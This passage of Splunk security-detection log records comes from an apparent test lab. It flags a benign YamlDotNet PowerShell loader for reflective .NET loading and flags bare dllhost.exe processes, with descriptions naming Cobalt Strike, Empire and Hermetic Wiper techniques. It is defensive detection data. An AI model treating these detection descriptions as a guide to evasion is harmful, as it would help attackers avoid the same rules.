\"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T02:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T02:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664855732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T02:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T02:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664848800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664848800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4896", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664848800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664848800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="16708", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664848800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664848800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4144", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664848800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664848800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1320", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664852132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664852132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664852132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664852132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T01:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T01:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if 